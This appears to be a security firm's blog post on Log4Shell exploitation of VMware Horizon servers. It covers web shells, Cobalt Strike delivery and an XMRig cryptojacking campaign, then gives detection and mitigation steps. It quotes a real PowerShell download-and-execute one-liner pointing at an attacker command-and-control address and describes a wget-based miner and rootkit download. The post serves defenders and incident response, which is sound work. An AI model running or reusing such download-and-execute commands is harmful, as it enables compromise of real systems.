
Log4j Behavior Detection and Mitigation

Todd Ellis

Chief Technical Officer

Todd is a Marine Corps veteran with 6 years of service. He and his wife Kerri founded Secure Networkers in 2010 with a desire to achieve success with his uncanny ability to “think outside the box.” He has an unwavering persistence in finding data security solutions in the world of computer networking. His passion for IT and security began in the Marines. From there he went on to work as an instructor for the new network he helped create for the Marine Corps. He began consulting as a network engineer and started the precursor to Secure Networkers in 1996. He has received training and certifications in a vast number of facets of IT.

On January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges). According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.

Huntress is continuing to track this activity and this post will be updated with new information as it becomes available.

Based on Huntress’ data set of 180 Horizon servers, they’ve validated NHS’ intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js web shell. It’s important to note that ~34% of the 180 Horizon servers (62) they analyzed were unpatched and internet-facing at the time of this publication. The web shells on these 18 compromised systems established a timeline that started on December 25, 2021 and continued until December 29, 2021.


New Behavior

On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped Huntress’ ThreatOps team to new exploitation of the Log4Shell vulnerability in VMware Horizon. This time it was used to deliver the Cobalt Strike implant.

Additional security researchers including The DFIR Report and Red Canary reported similar behavior around the same time—confirming a PowerShell based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83[.]116 for command and control.

iex ((New-Object System.Net.WebClient).DownloadString('http://185.112.83[.]116:8080/drv'))

At 1938 ET, Huntress started deploying Huntress’ soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. This new EDR capability is based on an acquisition Huntress made in early 2021 and allows them to proactively detect and respond to non-persistent malicious behavior by giving them the ability to collect detailed information about processes.

Initial Access Source

Despite mass exploitation of VMware Horizon to deliver web shells, Huntress’ data suggests today’s Cobalt Strike deployments were exploitations of Horizon itself and not the abuse of web shells. This conclusion is largely based on analysis of the PowerShell payload’s parent process: web shell abuse spawns from node.exe, while exploitation of Log4Shell in Horizon spawns from ws_tomcatservice.exe, as pictured below. Secure Networkers observed this type of web shell activity trying to execute the xmrig.zip and xmrig-6.zip files. After researching the locations, we found the shells were being run from numerous locations throughout the world on what appeared to be compromised systems.

Here is the file signature that was used:

(366b32c15ff2b30da5cafc1407e6dc49aa4bbecffc34c438302022acd1c00b8e)

Link to the virus total page:

https://www.virustotal.com/gui/file/366b32c15ff2b30da5cafc1407e6dc49aa4bbecffc34c438302022acd1c00b8e/behavior/C2AE

(Rendered in Elastic Kibana with Huntress’ Process Insights)

Mostly this is being recognized as a cryptojacking campaign. One report that we saw showed that the XMRig miner registered itself as a service. This script also avoids detection by using a user-mode rootkit from the C2 (command and control) server. The shell script contains commands which contact the C2 server and download the XMRig miner, configuration file, and the user-mode rootkit. The script then uses the wget utility to get the components mentioned and chmod to make the components executable. The report also said that the rootkit gets saved as libload.so and modifies vSphere to run the XMRig cryptominer. The report said that the attacker’s wallet had been paid 8.942 XMR ($1790) at the time of the report.

Detection Tips

For those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells, you should seriously consider the possibility that your server is compromised if it was unpatched and internet-facing. To help you determine your status, we strongly suggest you perform the following actions:

  • Run VMware’s Horizon Mitigation tool to report whether there is a vulnerable Log4J library or child_process based web shell present under the installation location with the following command: Horizon_Windows_Log4j_Mitigation.bat /verbose
  • Manually inspect/assess the files within %ProgramFiles%\VMware\VMware View\Server\appblastgateway\ for the presence of the child_process string as pictured here.
  • Review historical records for evidence of node.exe or ws_TomcatService.exe spawning abnormal processes to include PowerShell.

Mitigation Steps

This new wave of coordinated hacking emphasizes the criticality of patching these servers immediately. VMware has produced detailed guidance to help you address these security vulnerabilities.

Should you discover a web shell, VMware recommends you “take down the system and engage your Incident Response Team” to fully assess the compromise. Alternatively, Huntress recommends you restore from a backup prior to December 25 to remove the web shell. Restoring from backups prior to December 25th is what we have been doing so far. With that said, it’s entirely possible attackers exploited CVE-2021-44228 and CVE-2021-45046 to spread laterally within your network so you should proceed with caution.